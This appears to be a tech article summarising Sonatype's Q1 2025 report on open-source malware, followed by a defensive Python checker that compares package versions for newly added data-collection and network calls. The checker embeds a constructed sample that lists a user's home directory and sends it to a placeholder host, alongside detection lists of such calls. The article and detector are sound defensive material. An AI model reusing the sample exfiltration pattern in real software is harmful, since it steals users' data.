Early 2025 has seen a huge increase in open-source malware

Open-source software is integral to keeping the Internet up and running, as well as critical tech infrastructure across the world. It’s an indispensable part of everyone’s everyday lives, even if they don’t know it. 

Despite its overall positive influence on the online world, open-source software isn’t without risk. Unfortunately, according to recent data from software supply chain security company Sonatype, the risk is increasing, particularly when it comes to malware. Its Open Source Malware Index Q1 2025 reports that the company discovered 17,954 open-source malware packages in the first quarter of 2025 alone, a 230% increase from the same period last year.

Before we take a closer look at the data, let’s explore what makes open-source software vulnerable to malware.

What is open-source malware? 

Open-source malware refers to open-source software that has malicious code embedded within it. Ironically, the very benefits of open-source software also make it an appealing target for cybercriminals. These include:

Open accessibility 

Because open-source code is publicly available, cybercriminals can repurpose it for malicious activities fairly easily. 

Trust-based ecosystem

Trust is integral to how the open-source community operates. This can sometimes mean there are fewer rigorous security checks than in proprietary software development. Cybercriminals exploit this trust in several ways, such as contributing malicious code themselves or compromising contributors’ accounts to inject malware.

Wide distribution

As we’ve mentioned already, open-source projects are critical to a wide variety of apps and services. So malicious code can spread widely within a very short time, potentially impacting a whole host of organizations and users globally.

What the Q1 data shows

The researchers analyzed the data and made some interesting discoveries. The most common type of malware was related to data exfiltration. It made up 56% of the open-source malware packages. This is software that can steal sensitive data from an infected system. 

Crypto-mining malware has doubled since the final quarter of 2024, now accounting for 7% of malicious packages in the first quarter of 2025. 80% of packages featured more sophisticated and threatening types of malware, such as droppers and code injection malware.

The report also dives into some notable discoveries, one of which is a case where ten popular and legitimate cryptocurrency packages were hijacked and changed to include malicious payloads that aim to steal sensitive information. Each package still performed its original function, all the while stealing data such as user profile information and directory listings. This case of open-source software corruption is all the more notable considering how integral trust is to the way the ecosystem functions.
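One defensive check the hijacked-package case points to, written here as an added example and not taken from the Sonatype report: diff the calls made by two versions of a package and flag a release that keeps its public functions intact yet newly gains file-enumeration, user-profile and network capability. The two source strings, the placeholder URL and the capability lists are constructed for this example.

```python
import ast

# Constructed sample of one function before and after a hypothetical hijack: the
# new release returns the same value but also collects and sends a home listing.
LEGIT_SRC = '''
def price(symbol):
    return lookup(symbol) * 1.0
'''
HIJACKED_SRC = '''
import os, urllib.request
def price(symbol):
    home = os.path.expanduser("~")
    report = str(os.listdir(home)).encode()
    urllib.request.urlopen("http://placeholder.invalid/", data=report)
    return lookup(symbol) * 1.0
'''

# Heuristic capability buckets chosen for this example (not Sonatype's ruleset).
CAPABILITIES = {
    "fs_enumeration": {"os.listdir", "os.walk", "os.scandir", "glob.glob"},
    "user_profile": {"os.path.expanduser", "os.getlogin", "getpass.getuser", "os.environ.get"},
    "network": {"urllib.request.urlopen", "requests.post", "requests.get", "socket.socket"},
}

def _dotted(node):
    """Return 'pkg.mod.func' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def called_names(src):
    # Every dotted callee that appears in a Call expression anywhere in the file.
    return {name for node in ast.walk(ast.parse(src))
            if isinstance(node, ast.Call) if (name := _dotted(node.func))}

def defined_functions(src):
    return {n.name for n in ast.walk(ast.parse(src)) if isinstance(n, ast.FunctionDef)}

def review_update(old_src, new_src):
    # Flag a release that keeps the old API intact yet gains collection plus network calls.
    added = called_names(new_src) - called_names(old_src)
    caps = {cap: sorted(added & names) for cap, names in CAPABILITIES.items() if added & names}
    keeps_api = defined_functions(old_src) <= defined_functions(new_src)
    suspicious = keeps_api and "network" in caps and len(caps) > 1
    return {"keeps_api": keeps_api, "new_capabilities": caps, "suspicious": suspicious}
```

Run against the real previous and current tarballs of a dependency before upgrading; a hit is a reason to read the diff, not proof of compromise.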
